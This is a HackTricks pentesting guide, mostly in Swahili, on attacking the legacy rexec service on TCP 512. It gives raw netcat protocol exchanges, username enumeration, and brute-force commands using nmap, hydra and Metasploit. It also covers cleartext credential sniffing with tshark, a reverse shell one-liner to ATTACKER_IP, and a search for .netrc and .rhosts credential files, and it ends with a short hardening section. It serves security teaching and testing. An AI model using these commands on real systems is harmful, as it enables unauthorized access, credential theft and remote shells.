512 - Pentesting Rexec

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Taarifa za Msingi

Rexec (remote exec) ni mojawapo ya huduma za asili za r-services za Berkeley (pamoja na rlogin, rsh, …). Inatoa uwezo wa remote command-execution uliothibitishwa tu kwa clear-text username and password. Itifaki ilifafanuliwa mwanzoni mwa miaka ya 1980 (see RFC 1060) na hivi sasa inachukuliwa kuwa insecure by design. Hata hivyo bado huwa imewezeshwa kwa chaguo-msingi kwenye baadhi ya vifaa vya kale vya UNIX / vinavyounganishwa kwenye mtandao na wakati mwingine hujitokeza katika internal pentests.

Default Port: TCP 512 (exec)

PORT    STATE SERVICE
512/tcp open  exec

🔥 Trafiki yote – ikijumuisha credentials – inatumwa unencrypted. Mtu yeyote mwenye uwezo wa kusikiliza mtandao anaweza kupata username, password na command.

Muhtasari wa protokoli

1. Client connects to TCP 512.
2. Client sends three NUL-terminated strings:

• the port number (as ASCII) where it wishes to receive stdout/stderr (often 0),
• the username,
• the password.

3. A final NUL-terminated string with the command to execute is sent.
4. The server replies with a single 8-bit status byte (0 = success, 1 = failure) followed by the command output.

If the first field is non-zero, the server opens a second TCP connection back to the client and uses it for stderr. This is useful both for manual testing and for fingerprinting filtering / firewall issues around the service.

That means you can reproduce the exchange with nothing more than echo -e and nc:

(echo -ne "0\0user\0password\0id\0"; cat) | nc <target> 512

Ikiwa credentials ziko halali, utapokea output ya id moja kwa moja kwenye connection ile ile.

Ikiwa unataka kupokea stderr kwenye listener maalum, muulize server i-connect back kwako:

nc -lvnp 4444
printf '4444\0user\0password\0id; uname -a\0' | nc <target> 512

Mifumo mingi ya kawaida (kwa mfano GNU rexecd) bado zinabana mashamba ya 16-byte username/password fields na hurudisha different diagnostic strings kwa invalid usernames dhidi ya invalid passwords. Hii ni muhimu wakati wa enumeration kwa sababu baadhi ya malengo hutoa leak ikiwa akaunti ipo kabla hujaanza brute forcing.

Matumizi ya mwongozo na client

Distribusheni nyingi za Linux bado zinapakia client ya zamani ndani ya kifurushi cha inetutils-rexec / rsh-client:

rexec -l user -p password <target> "uname -a"

Ikiwa -p haijatolewa, mteja atauliza nenosiri kwa njia ya mwingiliano (linaloonekana kwenye mtandao kwa maandishi wazi!).

Ili kuepuka kuacha nenosiri katika historia ya shell yako / kwenye orodha ya michakato, GNU rexec pia inaunga mkono kusoma nenosiri kutoka stdin:

printf '%s\n' 'password' | rexec -l user -p - <target> "id"

Hii si salama zaidi kwenye mtandao; inapunguza tu kufichuka kwa ndani kwenye mwenyeji wa mshambuliaji.

Enumeration & Brute-forcing

Brute-force

Nmap

nmap -sV -p 512 <target>
# Confirm the classic exec service before credential attacks

nmap -p 512 --script rexec-brute --script-args "userdb=users.txt,passdb=rockyou.txt" <target>

NSE ya rexec-brute inatumia itifaki iliyotajwa hapo juu kujaribu maelezo ya kuingia kwa haraka sana .

Hydra / Medusa / Ncrack

hydra -L users.txt -P passwords.txt rexec://<target> -s 512 -t 8

hydra ina moduli maalum ya rexec na bado ni fastest offline bruteforcer. medusa (-M REXEC) na ncrack (rexec module) zinaweza kutumika kwa njia ile ile.

Kuorodhesha majina ya watumiaji kupitia ujumbe za seva

Baadhi ya utekelezaji wa rexecd huonyesha makosa tofauti kama Login incorrect. dhidi ya Password incorrect.. Ikiwa unaona tabia hii, thibitisha majina ya watumiaji kwanza na kisha tu fanya brute force kwa nywila:

printf '0\0root\0wrongpass\0id\0' | nc -w 2 <target> 512 | tail -c +2
printf '0\0definitelynotreal\0wrongpass\0id\0' | nc -w 2 <target> 512 | tail -c +2

Ikiwa ujumbe ni tofauti, jenga orodha ya watumiaji halali kabla ya kutuma password spray kubwa.

Angalia r-services zinazohusiana

rexec yenyewe inatumia password authentication, tofauti na rsh / rlogin trusted-host logic, lakini kwa vitendo mara nyingi hutoka kwenye paketi ile ile ya zamani (openbsd-inetd, inetutils, vendor UNIX bundles). Ikiwa TCP 512 imefunguliwa, angalia mara moja TCP 513 na 514 pia kwa sababu .rhosts / /etc/hosts.equiv abuse inaweza kutoa njia rahisi za lateral movement:

nmap -sV -p 512,513,514 <target>

Tazama pia:

514 - Pentesting Rsh

513 - Pentesting Rlogin

Metasploit

use auxiliary/scanner/rservices/rexec_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run

Moduli itafungua shell ikiwa itafanikiwa na itahifadhi credentials katika database.

Sniffing credentials

Kwa sababu kila kitu kiko clear-text, network captures are priceless. Kwa nakala ya traffic unaweza kutoa creds bila kugusa target:

tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \
awk -F"\\0" '{print $2":"$3" -> "$4}'  # username:password -> command

(In Wireshark wezesha Decode As … TCP 512 → REXEC kuona mashamba yaliyotafsiriwa vizuri.)

Post-Exploitation tips

• Amri zinaendeshwa kwa vigezo vya mtumiaji aliyetoa. Ikiwa /etc/pam.d/rexec imepangwa vibaya (kwa mfano pam_rootok), root shells zinaweza kupatikana mara kwa mara.
• Rexec inapuuzia shell ya mtumiaji na inatekeleza amri kupitia /bin/sh -c <cmd>. Unaweza kwa hivyo kutumia mbinu za kawaida za shell-escape (;, $( ), backticks) kuunganisha amri nyingi au kuanzisha reverse shells:

rexec -l user -p pass <target> 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'

• Manenosiri mara nyingi huhifadhiwa katika ~/.netrc au scripts za otomatiki za zamani kwenye mifumo mingine; ukifaulu kuiba mwenyeji mmoja unaweza kuyatumia tena kwa lateral movement:

find / -xdev \( -name .netrc -o -name netrc -o -iname '*rexec*' -o -path '*/.rhosts' \) 2>/dev/null

Kukaza / Ugunduzi

• Usifichue rexec; badilisha na SSH. Karibu superservers zote za kisasa za inetd zinaweka huduma hiyo kuwa comment-ed kwa default.
• Ikiwa lazima uiweke, zuia upatikanaji kwa TCP wrappers (/etc/hosts.allow) au sheria za firewall na ulazimishe manenosiri madhubuti kwa kila akaunti.
• Chunguza trafiki kuelekea :512 na uzinduzi wa mchakato wa rexecd. Kukamata pakiti moja inatosha kugundua kuathiriwa.
• Zima rexec, rlogin, rsh pamoja – zinashiriki sehemu kubwa ya codebase na udhaifu.

References

• GNU Inetutils rexecd / rexec documentation – https://www.gnu.org/software/inetutils/manual/html_node/rexecd-invocation.html
• Nmap NSE rexec-brute documentation – https://nmap.org/nsedoc/scripts/rexec-brute.html

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.